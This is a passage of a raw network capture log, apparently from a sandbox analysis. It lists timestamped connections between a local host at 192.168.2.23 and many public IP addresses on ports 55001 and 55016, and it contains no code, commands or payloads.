                                              Dec 13, 2024 01:14:29.650305033 CET655005501192.168.2.23162.110.238.4
                                              Dec 13, 2024 01:14:29.650310040 CET655005501192.168.2.2392.134.88.147
                                              Dec 13, 2024 01:14:29.650319099 CET550165500142.40.9.55192.168.2.23
                                              Dec 13, 2024 01:14:29.650322914 CET655005501192.168.2.23148.47.226.142
                                              Dec 13, 2024 01:14:29.650325060 CET550165500101.156.8.88192.168.2.23
                                              Dec 13, 2024 01:14:29.650330067 CET550165500191.129.13.93192.168.2.23
                                              Dec 13, 2024 01:14:29.650336027 CET550165500167.27.9.190192.168.2.23
                                              Dec 13, 2024 01:14:29.650366068 CET655005501192.168.2.23101.156.8.88
                                              Dec 13, 2024 01:14:29.650393963 CET655005501192.168.2.23167.27.9.190
                                              Dec 13, 2024 01:14:29.650430918 CET655005501192.168.2.23142.40.9.55
                                              Dec 13, 2024 01:14:29.650430918 CET655005501192.168.2.23191.129.13.93
                                              Dec 13, 2024 01:14:29.650449991 CET55016550074.42.204.185192.168.2.23
                                              Dec 13, 2024 01:14:29.650456905 CET55016550084.48.138.139192.168.2.23
                                              Dec 13, 2024 01:14:29.650470018 CET550165500173.209.2.231192.168.2.23
                                              Dec 13, 2024 01:14:29.650475025 CET55016550082.143.239.231192.168.2.23
                                              Dec 13, 2024 01:14:29.650480986 CET550165500117.12.219.43192.168.2.23
                                              Dec 13, 2024 01:14:29.650492907 CET550165500170.211.85.209192.168.2.23
                                              Dec 13, 2024 01:14:29.650499105 CET55016550082.227.242.116192.168.2.23
                                              Dec 13, 2024 01:14:29.650501966 CET655005501192.168.2.2384.48.138.139
                                              Dec 13, 2024 01:14:29.650505066 CET550165500118.90.68.188192.168.2.23
                                              Dec 13, 2024 01:14:29.650509119 CET655005501192.168.2.2374.42.204.185
                                              Dec 13, 2024 01:14:29.650512934 CET550165500171.73.160.88192.168.2.23
                                              Dec 13, 2024 01:14:29.650518894 CET55016550058.229.240.132192.168.2.23
                                              Dec 13, 2024 01:14:29.650525093 CET55016550061.99.33.128192.168.2.23
                                              Dec 13, 2024 01:14:29.650530100 CET550165500219.67.231.93192.168.2.23
                                              Dec 13, 2024 01:14:29.650532007 CET655005501192.168.2.23173.209.2.231
                                              Dec 13, 2024 01:14:29.650532007 CET655005501192.168.2.23117.12.219.43
                                              Dec 13, 2024 01:14:29.650533915 CET655005501192.168.2.23170.211.85.209
                                              Dec 13, 2024 01:14:29.650533915 CET655005501192.168.2.2382.143.239.231
                                              Dec 13, 2024 01:14:29.650536060 CET550165500102.115.205.128192.168.2.23
                                              Dec 13, 2024 01:14:29.650540113 CET655005501192.168.2.23118.90.68.188
                                              Dec 13, 2024 01:14:29.650541067 CET550165500207.4.224.244192.168.2.23
                                              Dec 13, 2024 01:14:29.650547981 CET55016550075.245.39.228192.168.2.23
                                              Dec 13, 2024 01:14:29.650553942 CET55016550013.226.103.66192.168.2.23
                                              Dec 13, 2024 01:14:29.650554895 CET655005501192.168.2.23171.73.160.88
                                              Dec 13, 2024 01:14:29.650554895 CET655005501192.168.2.2361.99.33.128
                                              Dec 13, 2024 01:14:29.650554895 CET655005501192.168.2.2358.229.240.132
                                              Dec 13, 2024 01:14:29.650554895 CET655005501192.168.2.2382.227.242.116
                                              Dec 13, 2024 01:14:29.650557995 CET655005501192.168.2.23219.67.231.93
                                              Dec 13, 2024 01:14:29.650558949 CET55016550018.36.157.210192.168.2.23
                                              Dec 13, 2024 01:14:29.650572062 CET655005501192.168.2.23102.115.205.128
                                              Dec 13, 2024 01:14:29.650631905 CET655005501192.168.2.2318.36.157.210
                                              Dec 13, 2024 01:14:29.650635958 CET655005501192.168.2.23207.4.224.244
                                              Dec 13, 2024 01:14:29.650635958 CET655005501192.168.2.2375.245.39.228
                                              Dec 13, 2024 01:14:29.650635958 CET655005501192.168.2.2313.226.103.66
                                              Dec 13, 2024 01:14:29.650928974 CET550165500211.80.192.100192.168.2.23
                                              Dec 13, 2024 01:14:29.650948048 CET550165500191.26.63.240192.168.2.23
                                              Dec 13, 2024 01:14:29.650954008 CET55016550066.219.129.78192.168.2.23
                                              Dec 13, 2024 01:14:29.650978088 CET655005501192.168.2.23211.80.192.100
                                              Dec 13, 2024 01:14:29.650996923 CET655005501192.168.2.2366.219.129.78
                                              Dec 13, 2024 01:14:29.651004076 CET550165500107.24.25.77192.168.2.23
                                              Dec 13, 2024 01:14:29.651010036 CET550165500145.113.254.55192.168.2.23
                                              Dec 13, 2024 01:14:29.651029110 CET550165500126.152.173.210192.168.2.23
                                              Dec 13, 2024 01:14:29.651041985 CET550165500117.195.36.173192.168.2.23
                                              Dec 13, 2024 01:14:29.651060104 CET550165500110.125.231.85192.168.2.23
                                              Dec 13, 2024 01:14:29.651066065 CET55016550088.175.127.172192.168.2.23
                                              Dec 13, 2024 01:14:29.651068926 CET655005501192.168.2.23145.113.254.55
                                              Dec 13, 2024 01:14:29.651076078 CET655005501192.168.2.23126.152.173.210
                                              Dec 13, 2024 01:14:29.651076078 CET655005501192.168.2.23107.24.25.77
                                              Dec 13, 2024 01:14:29.651098013 CET655005501192.168.2.2388.175.127.172
                                              Dec 13, 2024 01:14:29.651098013 CET655005501192.168.2.23110.125.231.85
                                              Dec 13, 2024 01:14:29.651109934 CET55016550076.220.141.84192.168.2.23
                                              Dec 13, 2024 01:14:29.651115894 CET550165500203.199.232.171192.168.2.23
                                              Dec 13, 2024 01:14:29.651122093 CET55016550044.139.182.172192.168.2.23
                                              Dec 13, 2024 01:14:29.651150942 CET550165500157.124.167.186192.168.2.23
                                              Dec 13, 2024 01:14:29.651168108 CET55016550052.182.176.38192.168.2.23
                                              Dec 13, 2024 01:14:29.651168108 CET655005501192.168.2.2376.220.141.84
                                              Dec 13, 2024 01:14:29.651209116 CET550165500192.50.203.134192.168.2.23
                                              Dec 13, 2024 01:14:29.651216030 CET5501655009.97.151.69192.168.2.23
                                              Dec 13, 2024 01:14:29.651221037 CET655005501192.168.2.2352.182.176.38
                                              Dec 13, 2024 01:14:29.651238918 CET5501655004.108.99.10192.168.2.23
                                              Dec 13, 2024 01:14:29.651247025 CET655005501192.168.2.239.97.151.69
                                              Dec 13, 2024 01:14:29.651277065 CET55016550023.182.113.118192.168.2.23
                                              Dec 13, 2024 01:14:29.651307106 CET5501655002.43.218.186192.168.2.23
                                              Dec 13, 2024 01:14:29.651326895 CET55016550065.25.91.211192.168.2.23
                                              Dec 13, 2024 01:14:29.651336908 CET655005501192.168.2.23157.124.167.186
                                              Dec 13, 2024 01:14:29.651338100 CET655005501192.168.2.2344.139.182.172
                                              Dec 13, 2024 01:14:29.651338100 CET655005501192.168.2.23191.26.63.240
                                              Dec 13, 2024 01:14:29.651338100 CET655005501192.168.2.23203.199.232.171
                                              Dec 13, 2024 01:14:29.651339054 CET655005501192.168.2.23117.195.36.173
                                              Dec 13, 2024 01:14:29.651339054 CET655005501192.168.2.23192.50.203.134
                                              Dec 13, 2024 01:14:29.651364088 CET655005501192.168.2.234.108.99.10
                                              Dec 13, 2024 01:14:29.651364088 CET655005501192.168.2.232.43.218.186
                                              Dec 13, 2024 01:14:29.651364088 CET655005501192.168.2.2323.182.113.118
                                              Dec 13, 2024 01:14:29.651364088 CET655005501192.168.2.2365.25.91.211
                                              Dec 13, 2024 01:14:29.651395082 CET55016550031.12.102.152192.168.2.23
                                              Dec 13, 2024 01:14:29.651401043 CET550165500109.211.192.197192.168.2.23
                                              Dec 13, 2024 01:14:29.651413918 CET550165500202.90.133.94192.168.2.23
                                              Dec 13, 2024 01:14:29.651418924 CET550165500137.210.237.9192.168.2.23
                                              Dec 13, 2024 01:14:29.651424885 CET550165500180.173.251.54192.168.2.23
                                              Dec 13, 2024 01:14:29.651437998 CET55016550090.21.242.17192.168.2.23
                                              Dec 13, 2024 01:14:29.651443005 CET655005501192.168.2.23109.211.192.197
                                              Dec 13, 2024 01:14:29.651443958 CET550165500147.94.17.47192.168.2.23
                                              Dec 13, 2024 01:14:29.651446104 CET655005501192.168.2.2331.12.102.152
                                              Dec 13, 2024 01:14:29.651448965 CET550165500158.201.138.82192.168.2.23
                                              Dec 13, 2024 01:14:29.651494026 CET655005501192.168.2.2390.21.242.17
                                              Dec 13, 2024 01:14:29.651494026 CET655005501192.168.2.23147.94.17.47
                                              Dec 13, 2024 01:14:29.651565075 CET655005501192.168.2.23158.201.138.82
                                              Dec 13, 2024 01:14:29.651565075 CET655005501192.168.2.23137.210.237.9
                                              Dec 13, 2024 01:14:29.651565075 CET655005501192.168.2.23202.90.133.94
                                              Dec 13, 2024 01:14:29.651565075 CET655005501192.168.2.23180.173.251.54
                                              Dec 13, 2024 01:14:29.651958942 CET550165500179.229.117.13192.168.2.23
                                              Dec 13, 2024 01:14:29.651966095 CET550165500142.83.226.206192.168.2.23
                                              Dec 13, 2024 01:14:29.651973009 CET55016550090.32.117.96192.168.2.23
                                              Dec 13, 2024 01:14:29.652019024 CET55016550040.49.235.169192.168.2.23
                                              Dec 13, 2024 01:14:29.652018070 CET655005501192.168.2.23179.229.117.13
                                              Dec 13, 2024 01:14:29.652019024 CET655005501192.168.2.2390.32.117.96
                                              Dec 13, 2024 01:14:29.652019024 CET655005501192.168.2.23142.83.226.206
                                              Dec 13, 2024 01:14:29.652024984 CET55016550083.123.17.40192.168.2.23
                                              Dec 13, 2024 01:14:29.652087927 CET550165500158.109.32.91192.168.2.23
                                              Dec 13, 2024 01:14:29.652101040 CET55016550066.96.251.52192.168.2.23
                                              Dec 13, 2024 01:14:29.652107000 CET550165500183.11.16.239192.168.2.23
                                              Dec 13, 2024 01:14:29.652112961 CET550165500192.240.28.15192.168.2.23
                                              Dec 13, 2024 01:14:29.652124882 CET55016550024.161.210.72192.168.2.23
                                              Dec 13, 2024 01:14:29.652132034 CET655005501192.168.2.23158.109.32.91
                                              Dec 13, 2024 01:14:29.652132988 CET655005501192.168.2.2383.123.17.40
                                              Dec 13, 2024 01:14:29.652143955 CET655005501192.168.2.2340.49.235.169
                                              Dec 13, 2024 01:14:29.652144909 CET550165500222.39.17.19192.168.2.23
                                              Dec 13, 2024 01:14:29.652152061 CET550165500160.164.99.237192.168.2.23
                                              Dec 13, 2024 01:14:29.652157068 CET655005501192.168.2.23183.11.16.239
                                              Dec 13, 2024 01:14:29.652158022 CET550165500212.123.81.230192.168.2.23
                                              Dec 13, 2024 01:14:29.652162075 CET655005501192.168.2.23192.240.28.15
                                              Dec 13, 2024 01:14:29.652165890 CET550165500202.187.55.65192.168.2.23
                                              Dec 13, 2024 01:14:29.652173996 CET655005501192.168.2.2366.96.251.52
                                              Dec 13, 2024 01:14:29.652177095 CET655005501192.168.2.2324.161.210.72
                                              Dec 13, 2024 01:14:29.652177095 CET655005501192.168.2.23160.164.99.237
                                              Dec 13, 2024 01:14:29.652189016 CET655005501192.168.2.23222.39.17.19
                                              Dec 13, 2024 01:14:29.652193069 CET655005501192.168.2.23212.123.81.230
                                              Dec 13, 2024 01:14:29.652204990 CET655005501192.168.2.23202.187.55.65
                                              Dec 13, 2024 01:14:29.652266979 CET550165500200.132.9.158192.168.2.23
                                              Dec 13, 2024 01:14:29.652272940 CET550165500217.193.50.176192.168.2.23
                                              Dec 13, 2024 01:14:29.652277946 CET55016550032.164.126.240192.168.2.23
                                              Dec 13, 2024 01:14:29.652290106 CET550165500198.9.245.167192.168.2.23
                                              Dec 13, 2024 01:14:29.652295113 CET550165500176.8.9.196192.168.2.23
                                              Dec 13, 2024 01:14:29.652299881 CET55016550070.255.177.159192.168.2.23
                                              Dec 13, 2024 01:14:29.652324915 CET655005501192.168.2.2332.164.126.240
                                              Dec 13, 2024 01:14:29.652326107 CET655005501192.168.2.23217.193.50.176
                                              Dec 13, 2024 01:14:29.652326107 CET655005501192.168.2.23200.132.9.158
                                              Dec 13, 2024 01:14:29.652342081 CET655005501192.168.2.2370.255.177.159
                                              Dec 13, 2024 01:14:29.652342081 CET655005501192.168.2.23176.8.9.196
                                              Dec 13, 2024 01:14:29.652342081 CET655005501192.168.2.23198.9.245.167
                                              Dec 13, 2024 01:14:29.652421951 CET550165500183.71.43.5192.168.2.23
                                              Dec 13, 2024 01:14:29.652429104 CET550165500125.77.97.179192.168.2.23
                                              Dec 13, 2024 01:14:29.652441025 CET55016550034.135.167.32192.168.2.23
                                              Dec 13, 2024 01:14:29.652446985 CET550165500182.206.192.77192.168.2.23
                                              Dec 13, 2024 01:14:29.652451992 CET55016550072.143.205.105192.168.2.23
                                              Dec 13, 2024 01:14:29.652463913 CET550165500188.173.241.189192.168.2.23
                                              Dec 13, 2024 01:14:29.652468920 CET55016550054.214.114.158192.168.2.23
                                              Dec 13, 2024 01:14:29.652475119 CET550165500193.75.94.56192.168.2.23
                                              Dec 13, 2024 01:14:29.652478933 CET655005501192.168.2.23125.77.97.179
                                              Dec 13, 2024 01:14:29.652478933 CET655005501192.168.2.2334.135.167.32
                                              Dec 13, 2024 01:14:29.652483940 CET655005501192.168.2.23183.71.43.5
                                              Dec 13, 2024 01:14:29.652498960 CET655005501192.168.2.2372.143.205.105
                                              Dec 13, 2024 01:14:29.652508974 CET655005501192.168.2.23182.206.192.77
                                              Dec 13, 2024 01:14:29.652519941 CET655005501192.168.2.23193.75.94.56
                                              Dec 13, 2024 01:14:29.652519941 CET655005501192.168.2.23188.173.241.189
                                              Dec 13, 2024 01:14:29.652519941 CET655005501192.168.2.2354.214.114.158
                                              Dec 13, 2024 01:14:29.652791977 CET550165500155.211.72.119192.168.2.23
                                              Dec 13, 2024 01:14:29.652797937 CET550165500125.25.195.231192.168.2.23
                                              Dec 13, 2024 01:14:29.652813911 CET550165500102.13.106.162192.168.2.23
                                              Dec 13, 2024 01:14:29.652843952 CET655005501192.168.2.23155.211.72.119
                                              Dec 13, 2024 01:14:29.652843952 CET655005501192.168.2.23102.13.106.162
                                              Dec 13, 2024 01:14:29.652847052 CET655005501192.168.2.23125.25.195.231
                                              Dec 13, 2024 01:14:29.652864933 CET550165500216.118.52.154192.168.2.23
                                              Dec 13, 2024 01:14:29.652870893 CET550165500143.224.76.136192.168.2.23
                                              Dec 13, 2024 01:14:29.652878046 CET550165500206.251.145.0192.168.2.23
                                              Dec 13, 2024 01:14:29.652890921 CET550165500148.190.11.217192.168.2.23
                                              Dec 13, 2024 01:14:29.652915955 CET55016550088.217.0.171192.168.2.23
                                              Dec 13, 2024 01:14:29.652921915 CET550165500208.253.172.93192.168.2.23
                                              Dec 13, 2024 01:14:29.652924061 CET655005501192.168.2.23216.118.52.154
                                              Dec 13, 2024 01:14:29.652924061 CET655005501192.168.2.23143.224.76.136
                                              Dec 13, 2024 01:14:29.652972937 CET550165500211.242.95.101192.168.2.23
                                              Dec 13, 2024 01:14:29.652978897 CET55016550095.83.218.75192.168.2.23
                                              Dec 13, 2024 01:14:29.652985096 CET550165500112.210.254.163192.168.2.23
                                              Dec 13, 2024 01:14:29.652998924 CET550165500137.224.205.138192.168.2.23
                                              Dec 13, 2024 01:14:29.653002977 CET655005501192.168.2.23208.253.172.93
                                              Dec 13, 2024 01:14:29.653003931 CET550165500104.237.12.150192.168.2.23
                                              Dec 13, 2024 01:14:29.653028011 CET550165500153.91.173.136192.168.2.23
                                              Dec 13, 2024 01:14:29.653033972 CET655005501192.168.2.23206.251.145.0
                                              Dec 13, 2024 01:14:29.653033972 CET655005501192.168.2.23148.190.11.217
                                              Dec 13, 2024 01:14:29.653033972 CET655005501192.168.2.2388.217.0.171
                                              Dec 13, 2024 01:14:29.653033972 CET655005501192.168.2.23211.242.95.101
                                              Dec 13, 2024 01:14:29.653034925 CET655005501192.168.2.2395.83.218.75
                                              Dec 13, 2024 01:14:29.653050900 CET550165500181.250.197.218192.168.2.23
                                              Dec 13, 2024 01:14:29.653052092 CET655005501192.168.2.23112.210.254.163
                                              Dec 13, 2024 01:14:29.653052092 CET655005501192.168.2.23104.237.12.150
                                              Dec 13, 2024 01:14:29.653074026 CET550165500144.49.76.17192.168.2.23
                                              Dec 13, 2024 01:14:29.653080940 CET550165500176.51.234.250192.168.2.23
                                              Dec 13, 2024 01:14:29.653100014 CET55016550063.39.59.157192.168.2.23
                                              Dec 13, 2024 01:14:29.653105021 CET550165500201.27.198.105192.168.2.23
                                              Dec 13, 2024 01:14:29.653131962 CET655005501192.168.2.23144.49.76.17
                                              Dec 13, 2024 01:14:29.653225899 CET55016550060.78.120.33192.168.2.23
                                              Dec 13, 2024 01:14:29.653233051 CET550165500158.236.47.121192.168.2.23
                                              Dec 13, 2024 01:14:29.653239012 CET550165500135.133.233.85192.168.2.23
                                              Dec 13, 2024 01:14:29.653251886 CET55016550059.155.203.64192.168.2.23
                                              Dec 13, 2024 01:14:29.653258085 CET55016550096.123.196.3192.168.2.23
                                              Dec 13, 2024 01:14:29.653263092 CET550165500178.51.141.189192.168.2.23
                                              Dec 13, 2024 01:14:29.653275013 CET550165500111.159.10.154192.168.2.23
                                              Dec 13, 2024 01:14:29.653280020 CET550165500218.224.143.112192.168.2.23
                                              Dec 13, 2024 01:14:29.653284073 CET655005501192.168.2.23135.133.233.85
                                              Dec 13, 2024 01:14:29.653309107 CET655005501192.168.2.2359.155.203.64
                                              Dec 13, 2024 01:14:29.653309107 CET655005501192.168.2.23111.159.10.154
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.23137.224.205.138
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.23153.91.173.136
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.23181.250.197.218
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.23176.51.234.250
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.2363.39.59.157
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.23158.236.47.121
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.23201.27.198.105
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.2360.78.120.33
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.2396.123.196.3
                                              Dec 13, 2024 01:14:29.653310061 CET655005501192.168.2.23178.51.141.189
                                              Dec 13, 2024 01:14:29.653323889 CET655005501192.168.2.23218.224.143.112
                                              Dec 13, 2024 01:14:29.653585911 CET550165500218.42.219.159192.168.2.23
                                              Dec 13, 2024 01:14:29.653633118 CET550165500110.88.97.55192.168.2.23
                                              Dec 13, 2024 01:14:29.653641939 CET550165500130.36.180.142192.168.2.23
                                              Dec 13, 2024 01:14:29.653646946 CET5501655002.13.97.249192.168.2.23
                                              Dec 13, 2024 01:14:29.653692007 CET5501655008.93.9.21192.168.2.23
                                              Dec 13, 2024 01:14:29.653697968 CET55016550082.115.122.206192.168.2.23
                                              Dec 13, 2024 01:14:29.653717995 CET655005501192.168.2.23110.88.97.55
                                              Dec 13, 2024 01:14:29.653717995 CET655005501192.168.2.23218.42.219.159
                                              Dec 13, 2024 01:14:29.653718948 CET655005501192.168.2.23130.36.180.142
                                              Dec 13, 2024 01:14:29.653747082 CET55016550031.65.208.133192.168.2.23
                                              Dec 13, 2024 01:14:29.653753996 CET55016550027.117.125.87192.168.2.23
                                              Dec 13, 2024 01:14:29.653769970 CET55016550053.246.83.25192.168.2.23
                                              Dec 13, 2024 01:14:29.653784037 CET550165500147.186.140.125192.168.2.23
                                              Dec 13, 2024 01:14:29.653791904 CET550165500138.244.27.138192.168.2.23
                                              Dec 13, 2024 01:14:29.653804064 CET655005501192.168.2.232.13.97.249
                                              Dec 13, 2024 01:14:29.653804064 CET655005501192.168.2.238.93.9.21
                                              Dec 13, 2024 01:14:29.653804064 CET655005501192.168.2.2382.115.122.206
                                              Dec 13, 2024 01:14:29.653805971 CET655005501192.168.2.2327.117.125.87
                                              Dec 13, 2024 01:14:29.653808117 CET550165500204.86.61.209192.168.2.23
                                              Dec 13, 2024 01:14:29.653832912 CET550165500213.205.109.91192.168.2.23
                                              Dec 13, 2024 01:14:29.653836012 CET655005501192.168.2.23147.186.140.125
                                              Dec 13, 2024 01:14:29.653836966 CET655005501192.168.2.2331.65.208.133
                                              Dec 13, 2024 01:14:29.653837919 CET655005501192.168.2.2353.246.83.25
                                              Dec 13, 2024 01:14:29.653839111 CET55016550066.142.64.103192.168.2.23
                                              Dec 13, 2024 01:14:29.653837919 CET655005501192.168.2.23138.244.27.138
                                              Dec 13, 2024 01:14:29.653860092 CET655005501192.168.2.23204.86.61.209
                                              Dec 13, 2024 01:14:29.653879881 CET655005501192.168.2.2366.142.64.103
                                              Dec 13, 2024 01:14:29.653908014 CET550165500108.251.51.196192.168.2.23
                                              Dec 13, 2024 01:14:29.653914928 CET550165500190.42.228.66192.168.2.23
                                              Dec 13, 2024 01:14:29.653919935 CET550165500199.7.212.239192.168.2.23
                                              Dec 13, 2024 01:14:29.653934002 CET55016550068.155.2.18192.168.2.23
                                              Dec 13, 2024 01:14:29.653939962 CET55016550058.154.73.210192.168.2.23
                                              Dec 13, 2024 01:14:29.653944969 CET55016550023.237.232.105192.168.2.23
                                              Dec 13, 2024 01:14:29.653964996 CET655005501192.168.2.23108.251.51.196
                                              Dec 13, 2024 01:14:29.653968096 CET655005501192.168.2.23199.7.212.239
                                              Dec 13, 2024 01:14:29.653974056 CET655005501192.168.2.2368.155.2.18
                                              Dec 13, 2024 01:14:29.653974056 CET655005501192.168.2.2358.154.73.210
                                              Dec 13, 2024 01:14:29.653981924 CET655005501192.168.2.2323.237.232.105
                                              Dec 13, 2024 01:14:29.653985023 CET655005501192.168.2.23213.205.109.91
                                              Dec 13, 2024 01:14:29.653987885 CET655005501192.168.2.23190.42.228.66
                                              Dec 13, 2024 01:14:29.654053926 CET5501655002.224.150.230192.168.2.23
                                              Dec 13, 2024 01:14:29.654059887 CET550165500107.226.168.198192.168.2.23
                                              Dec 13, 2024 01:14:29.654073000 CET550165500170.58.109.25192.168.2.23
                                              Dec 13, 2024 01:14:29.654078960 CET550165500195.196.83.218192.168.2.23
                                              Dec 13, 2024 01:14:29.654083967 CET55016550043.233.65.34192.168.2.23
                                              Dec 13, 2024 01:14:29.654094934 CET550165500152.160.182.225192.168.2.23
                                              Dec 13, 2024 01:14:29.654100895 CET550165500206.98.123.16192.168.2.23
                                              Dec 13, 2024 01:14:29.654104948 CET655005501192.168.2.23107.226.168.198
                                              Dec 13, 2024 01:14:29.654104948 CET55016550058.28.122.64192.168.2.23
                                              Dec 13, 2024 01:14:29.654104948 CET655005501192.168.2.232.224.150.230
                                              Dec 13, 2024 01:14:29.654118061 CET655005501192.168.2.23195.196.83.218
                                              Dec 13, 2024 01:14:29.654119968 CET655005501192.168.2.23170.58.109.25
                                              Dec 13, 2024 01:14:29.654130936 CET655005501192.168.2.2343.233.65.34
                                              Dec 13, 2024 01:14:29.654130936 CET655005501192.168.2.23206.98.123.16
                                              Dec 13, 2024 01:14:29.654143095 CET655005501192.168.2.23152.160.182.225
                                              Dec 13, 2024 01:14:29.654205084 CET655005501192.168.2.2358.28.122.64
                                              Dec 13, 2024 01:14:29.654428005 CET550165500104.237.206.249192.168.2.23
                                              Dec 13, 2024 01:14:29.654488087 CET655005501192.168.2.23104.237.206.249
                                              Dec 13, 2024 01:14:29.654491901 CET550165500111.39.136.176192.168.2.23
                                              Dec 13, 2024 01:14:29.654500008 CET550165500126.48.120.208192.168.2.23
                                              Dec 13, 2024 01:14:29.654506922 CET550165500122.20.248.156192.168.2.23
                                              Dec 13, 2024 01:14:29.654520035 CET55016550080.209.194.84192.168.2.23
                                              Dec 13, 2024 01:14:29.654545069 CET550165500139.221.165.222192.168.2.23
                                              Dec 13, 2024 01:14:29.654546976 CET655005501192.168.2.23126.48.120.208
                                              Dec 13, 2024 01:14:29.654551983 CET550165500135.158.156.235192.168.2.23
                                              Dec 13, 2024 01:14:29.654557943 CET550165500173.158.236.98192.168.2.23
                                              Dec 13, 2024 01:14:29.654560089 CET655005501192.168.2.23111.39.136.176
                                              Dec 13, 2024 01:14:29.654577017 CET550165500209.16.255.18192.168.2.23
                                              Dec 13, 2024 01:14:29.654599905 CET550165500128.212.247.253192.168.2.23
                                              Dec 13, 2024 01:14:29.654604912 CET55016550065.233.44.249192.168.2.23
                                              Dec 13, 2024 01:14:29.654608011 CET655005501192.168.2.23173.158.236.98
                                              Dec 13, 2024 01:14:29.654612064 CET655005501192.168.2.23135.158.156.235
                                              Dec 13, 2024 01:14:29.654644012 CET655005501192.168.2.23209.16.255.18
                                              Dec 13, 2024 01:14:29.654647112 CET550165500118.186.97.35192.168.2.23
                                              Dec 13, 2024 01:14:29.654654026 CET550165500206.176.85.54192.168.2.23
                                              Dec 13, 2024 01:14:29.654664993 CET655005501192.168.2.2365.233.44.249
                                              Dec 13, 2024 01:14:29.654665947 CET655005501192.168.2.23122.20.248.156
                                              Dec 13, 2024 01:14:29.654666901 CET655005501192.168.2.23139.221.165.222
                                              Dec 13, 2024 01:14:29.654665947 CET655005501192.168.2.2380.209.194.84
                                              Dec 13, 2024 01:14:29.654665947 CET655005501192.168.2.23128.212.247.253
                                              Dec 13, 2024 01:14:29.654687881 CET655005501192.168.2.23206.176.85.54
                                              Dec 13, 2024 01:14:29.654691935 CET655005501192.168.2.23118.186.97.35
                                              Dec 13, 2024 01:14:29.654725075 CET55016550077.106.15.97192.168.2.23
                                              Dec 13, 2024 01:14:29.654731035 CET550165500136.32.18.16192.168.2.23
                                              Dec 13, 2024 01:14:29.654736042 CET550165500138.242.104.110192.168.2.23
                                              Dec 13, 2024 01:14:29.654759884 CET550165500219.144.31.77192.168.2.23
                                              Dec 13, 2024 01:14:29.654767036 CET550165500220.247.181.161192.168.2.23
                                              Dec 13, 2024 01:14:29.654779911 CET655005501192.168.2.23136.32.18.16
                                              Dec 13, 2024 01:14:29.654779911 CET655005501192.168.2.23138.242.104.110
                                              Dec 13, 2024 01:14:29.654786110 CET655005501192.168.2.2377.106.15.97
                                              Dec 13, 2024 01:14:29.654808998 CET550165500176.147.229.95192.168.2.23
                                              Dec 13, 2024 01:14:29.654812098 CET655005501192.168.2.23219.144.31.77
                                              Dec 13, 2024 01:14:29.654815912 CET550165500179.221.169.225192.168.2.23
                                              Dec 13, 2024 01:14:29.654870987 CET655005501192.168.2.23179.221.169.225
                                              Dec 13, 2024 01:14:29.654917002 CET550165500162.187.182.22192.168.2.23
                                              Dec 13, 2024 01:14:29.654923916 CET550165500223.86.237.221192.168.2.23
                                              Dec 13, 2024 01:14:29.654928923 CET55016550060.168.85.26192.168.2.23
                                              Dec 13, 2024 01:14:29.654943943 CET55016550036.137.52.237192.168.2.23
                                              Dec 13, 2024 01:14:29.654951096 CET55016550095.245.160.8192.168.2.23
                                              Dec 13, 2024 01:14:29.654956102 CET550165500196.93.58.122192.168.2.23
                                              Dec 13, 2024 01:14:29.654961109 CET550165500106.177.121.121192.168.2.23
                                              Dec 13, 2024 01:14:29.654968023 CET55016550077.195.1.77192.168.2.23
                                              Dec 13, 2024 01:14:29.654984951 CET655005501192.168.2.23223.86.237.221
                                              Dec 13, 2024 01:14:29.654984951 CET655005501192.168.2.2336.137.52.237
                                              Dec 13, 2024 01:14:29.654984951 CET655005501192.168.2.23162.187.182.22
                                              Dec 13, 2024 01:14:29.654984951 CET655005501192.168.2.2360.168.85.26
                                              Dec 13, 2024 01:14:29.654984951 CET655005501192.168.2.2395.245.160.8
                                              Dec 13, 2024 01:14:29.655008078 CET655005501192.168.2.2377.195.1.77
                                              Dec 13, 2024 01:14:29.655008078 CET655005501192.168.2.23106.177.121.121
                                              Dec 13, 2024 01:14:29.655008078 CET655005501192.168.2.23196.93.58.122
                                              Dec 13, 2024 01:14:29.655091047 CET655005501192.168.2.23220.247.181.161
                                              Dec 13, 2024 01:14:29.655091047 CET655005501192.168.2.23176.147.229.95
                                              Dec 13, 2024 01:14:29.655303955 CET550165500216.80.79.184192.168.2.23
                                              Dec 13, 2024 01:14:29.655354977 CET655005501192.168.2.23216.80.79.184
                                              Dec 13, 2024 01:14:29.655364990 CET550165500122.133.242.21192.168.2.23
                                              Dec 13, 2024 01:14:29.655371904 CET550165500164.145.201.152192.168.2.23
                                              Dec 13, 2024 01:14:29.655390024 CET550165500206.18.32.254192.168.2.23
                                              Dec 13, 2024 01:14:29.655404091 CET550165500105.103.169.109192.168.2.23
                                              Dec 13, 2024 01:14:29.655409098 CET550165500218.170.13.213192.168.2.23
                                              Dec 13, 2024 01:14:29.655416965 CET55016550084.120.162.173192.168.2.23
                                              Dec 13, 2024 01:14:29.655433893 CET655005501192.168.2.23206.18.32.254
                                              Dec 13, 2024 01:14:29.655433893 CET655005501192.168.2.23164.145.201.152
                                              Dec 13, 2024 01:14:29.655435085 CET655005501192.168.2.23122.133.242.21
                                              Dec 13, 2024 01:14:29.655440092 CET55016550044.220.143.158192.168.2.23
                                              Dec 13, 2024 01:14:29.655459881 CET655005501192.168.2.23105.103.169.109
                                              Dec 13, 2024 01:14:29.655459881 CET655005501192.168.2.2384.120.162.173
                                              Dec 13, 2024 01:14:29.655461073 CET655005501192.168.2.23218.170.13.213
                                              Dec 13, 2024 01:14:29.655463934 CET550165500153.6.112.173192.168.2.23
                                              Dec 13, 2024 01:14:29.655487061 CET655005501192.168.2.2344.220.143.158
                                              Dec 13, 2024 01:14:29.655508041 CET550165500154.154.9.208192.168.2.23
                                              Dec 13, 2024 01:14:29.655514002 CET550165500189.161.54.14192.168.2.23
                                              Dec 13, 2024 01:14:29.655524015 CET655005501192.168.2.23153.6.112.173
                                              Dec 13, 2024 01:14:29.655570030 CET550165500183.27.161.40192.168.2.23
                                              Dec 13, 2024 01:14:29.655597925 CET550165500175.10.189.150192.168.2.23
                                              Dec 13, 2024 01:14:29.655602932 CET55016550051.137.38.162192.168.2.23
